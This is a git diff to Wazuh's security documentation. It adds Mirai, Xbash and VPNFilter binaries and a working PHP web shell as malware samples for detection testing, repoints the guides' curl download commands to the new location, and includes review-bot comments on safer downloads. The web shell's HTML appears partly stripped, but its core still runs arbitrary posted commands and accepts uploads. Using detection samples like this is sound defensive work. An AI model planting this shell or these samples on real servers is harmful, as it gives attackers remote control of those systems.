diff --git a/CHANGELOG.md b/CHANGELOG.md
index 74ab8bbf5e..42fff29ea5 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,6 +14,7 @@ All notable changes to this project will be documented in this file.
- **Post-release**: Added indexer connector configuration steps to vulnerability detection documentation and removed troubleshooting section. ([#8942](https://github.com/wazuh/wazuh-documentation/pull/8942))
- **Post-release**: Updated the *Navigating the Wazuh dashboard* section. ([#8950](https://github.com/wazuh/wazuh-documentation/pull/8950))
- **Post-release**: Updated the System inventory documentation. ([#8955](https://github.com/wazuh/wazuh-documentation/pull/8955))
+- **Post-release**: Updated the URLs of malware samples. ([#8961](https://github.com/wazuh/wazuh-documentation/pull/8961))
### Fixed
diff --git a/resources/samples/mirai b/resources/samples/mirai
new file mode 100644
index 0000000000..ca15b985d4
Binary files /dev/null and b/resources/samples/mirai differ
diff --git a/resources/samples/vpn_filter b/resources/samples/vpn_filter
new file mode 100644
index 0000000000..ff5bdcc7cb
Binary files /dev/null and b/resources/samples/vpn_filter differ
diff --git a/resources/samples/webshell b/resources/samples/webshell
new file mode 100644
index 0000000000..1c068aa2be
--- /dev/null
+++ b/resources/samples/webshell
@@ -0,0 +1,70 @@
+body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}";
+print "
#worst @dal.net
";
+print "You have been hack By Shany with Love To #worst.
";
+print "Watch Your system Shany was here.
";
+print "Linux Shells
";
+print "
";
+
+$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
+$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+
+$UName = `uname -a`;
+$SCWD = `pwd`;
+$UserID = `id`;
+
+if( $currentWD == "" ) {
+ $currentWD = $SCWD;
+}
+
+print "";
+print "We are: | ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].") |
";
+print "Server is: | ".$_SERVER['SERVER_SIGNATURE']." |
";
+print "System type: | $UName |
";
+print "Our permissions: | $UserID |
";
+print "
";
+
+print "
";
+
+if( $_POST['_act'] == "List files!" ) {
+ $currentCMD = "ls -la";
+}
+
+print "
";
+
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( $_POST['_act'] == "Upload!" ) {
+ if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+ print "Error while uploading file!";
+ } else {
+ print "";
+ system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+ print "
File uploaded successfully!";
+ }
+} else {
+ print "\n\n\n\n";
+ $currentCMD = "cd ".$currentWD.";".$currentCMD;
+ system($currentCMD);
+ print "\n
\n\n\n
Command completed";
+}
+
+exit;
+
+?>
+
diff --git a/resources/samples/xbash b/resources/samples/xbash
new file mode 100644
index 0000000000..0b414d8ed8
Binary files /dev/null and b/resources/samples/xbash differ
diff --git a/source/proof-of-concept-guide/detect-malware-yara-integration.rst b/source/proof-of-concept-guide/detect-malware-yara-integration.rst
index b90f7c7b0f..4cf77e11fc 100644
--- a/source/proof-of-concept-guide/detect-malware-yara-integration.rst
+++ b/source/proof-of-concept-guide/detect-malware-yara-integration.rst
@@ -283,25 +283,25 @@ Attack emulation
# Mirai
echo "# Mirai: https://en.wikipedia.org/wiki/Mirai_(malware)"
echo "Downloading malware sample..."
- fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai" "/tmp/yara/malware/mirai" && echo "Done!" || echo "Error while downloading."
+ fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai" "/tmp/yara/malware/mirai" && echo "Done!" || echo "Error while downloading."
echo
# Xbash
echo "# Xbash: https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
echo "Downloading malware sample..."
- fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash" "/tmp/yara/malware/xbash" && echo "Done!" || echo "Error while downloading."
+ fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash" "/tmp/yara/malware/xbash" && echo "Done!" || echo "Error while downloading."
echo
# VPNFilter
echo "# VPNFilter: https://news.sophos.com/en-us/2018/05/24/vpnfilter-botnet-a-sophoslabs-analysis/"
echo "Downloading malware sample..."
- fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/vpn_filter" "/tmp/yara/malware/vpn_filter" && echo "Done!" || echo "Error while downloading."
+ fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/vpn_filter" "/tmp/yara/malware/vpn_filter" && echo "Done!" || echo "Error while downloading."
echo
# Webshell
echo "# WebShell: https://github.com/SecWiki/WebShell-2/blob/master/Php/Worse%20Linux%20Shell.php"
echo "Downloading malware sample..."
- fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/webshell" "/tmp/yara/malware/webshell" && echo "Done!" || echo "Error while downloading."
+ fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/webshell" "/tmp/yara/malware/webshell" && echo "Done!" || echo "Error while downloading."
echo
fi
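Review bot: The four `fetch_sample` URLs resolve through `refs/heads/|WAZUH_CURRENT_MINOR|`, a branch ref whose contents can change after the guide is published, and nothing on the new lines checks what was downloaded before it lands in `/tmp/yara/malware/`. These are live malware samples fetched by a script that readers run on a monitored endpoint, so consider pinning the URLs to a tag or commit and verifying a published digest after each download, e.g. `echo "<SHA256_OF_MIRAI_SAMPLE>  /tmp/yara/malware/mirai" | sha256sum -c -`. `fetch_sample` is defined outside this hunk, so whether it already fails on an HTTP error cannot be confirmed from here. The same branch-ref URLs appear in the hunks for leveraging-llms-for-alert-enrichment.rst, cdb-lists-threat-intelligence.rst and fim-yara.rst.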
diff --git a/source/proof-of-concept-guide/leveraging-llms-for-alert-enrichment.rst b/source/proof-of-concept-guide/leveraging-llms-for-alert-enrichment.rst
index 6fcf1e0dab..4772510eeb 100644
--- a/source/proof-of-concept-guide/leveraging-llms-for-alert-enrichment.rst
+++ b/source/proof-of-concept-guide/leveraging-llms-for-alert-enrichment.rst
@@ -633,9 +633,9 @@ Run the following commands on the Ubuntu endpoint to download malware samples to
.. code-block:: console
- # curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai" > /home/mirai
- # curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash" > /home/xbash
- # curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/webshell" > /home/webshell
+ # curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai" > /home/mirai
+ # curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash" > /home/xbash
+ # curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/webshell" > /home/webshell
You can visualize the alert data in the Wazuh dashboard. To do this, go to the **Modules** > **Security events** tab and add the ``rule.groups:yara`` filter in the search bar to query the alerts.
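Review bot: These three `curl` lines have no `--fail`, so an HTTP error from raw.githubusercontent.com is written to `/home/mirai` as the error text and the command still exits 0. That would happen if, for example, the `|WAZUH_CURRENT_MINOR|` branch does not exist yet or the substitution is not expanded inside the code block. The reader then sees no YARA alert and may conclude the detection is broken rather than the download. Suggest `# curl -fsSL "<same URL>" -o /home/mirai` for each line; the `curl` lines in the cdb-lists-threat-intelligence.rst and fim-yara.rst hunks have the same gap.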
@@ -668,9 +668,9 @@ Run the following commands via PowerShell to download malware samples to the mon
.. code-block:: powershell
- > curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai" -o $env:USERPROFILE\Downloads\mirai
- > curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash" -o $env:USERPROFILE\Downloads\xbash
- > curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/webshell" -o $env:USERPROFILE\Downloads\webshell
+ > curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai" -o $env:USERPROFILE\Downloads\mirai
+ > curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash" -o $env:USERPROFILE\Downloads\xbash
+ > curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/webshell" -o $env:USERPROFILE\Downloads\webshell
You can visualize the alert data in the Wazuh dashboard. To do this, go to the **Security events** module and add the filter in the search bar to query the alerts.
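Review bot: In Windows PowerShell 5.1 `curl` is an alias for `Invoke-WebRequest`, where `-o` is an ambiguous parameter prefix, so these three lines work as written only where `curl` resolves to the real binary (for example PowerShell 7). Naming the binary explicitly, `> curl.exe -fsSL "<same URL>" -o $env:USERPROFILE\Downloads\mirai`, removes the ambiguity. It also makes an HTTP error fail the command instead of saving the error body as the sample.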
diff --git a/source/user-manual/capabilities/malware-detection/cdb-lists-threat-intelligence.rst b/source/user-manual/capabilities/malware-detection/cdb-lists-threat-intelligence.rst
index 94b70682e1..ded116405a 100644
--- a/source/user-manual/capabilities/malware-detection/cdb-lists-threat-intelligence.rst
+++ b/source/user-manual/capabilities/malware-detection/cdb-lists-threat-intelligence.rst
@@ -118,8 +118,8 @@ To test that everything works correctly, download the *Mirai* and *Xbash* malwar
.. code-block:: console
- $ sudo curl https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai --output /mirai
- $ sudo curl https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash --output /Xbash
+ $ sudo curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai --output /mirai
+ $ sudo curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash --output /Xbash
Visualize the alerts
^^^^^^^^^^^^^^^^^^^^
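Review bot: Both download lines run the whole `curl` transfer as root only so that the output can be written to `/`. The fim-yara.rst hunk in this same commit downloads as the regular user and then uses `sudo mv`, which keeps the network client unprivileged. Consider the same shape here: `$ curl -fsSL <same URL> --output ~/mirai` followed by `$ sudo mv ~/mirai /mirai`, and likewise for Xbash.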
diff --git a/source/user-manual/capabilities/malware-detection/fim-yara.rst b/source/user-manual/capabilities/malware-detection/fim-yara.rst
index 94c5a75256..6217ab931c 100644
--- a/source/user-manual/capabilities/malware-detection/fim-yara.rst
+++ b/source/user-manual/capabilities/malware-detection/fim-yara.rst
@@ -319,8 +319,8 @@ To test that everything is working correctly, we use the *Mirai* and *Xbash* mal
.. code-block:: console
- $ curl https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai --output ~/mirai
- $ curl https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash --output ~/Xbash
+ $ curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai --output ~/mirai
+ $ curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash --output ~/Xbash
$ sudo mv ~/mirai /root/
$ sudo mv ~/Xbash /root/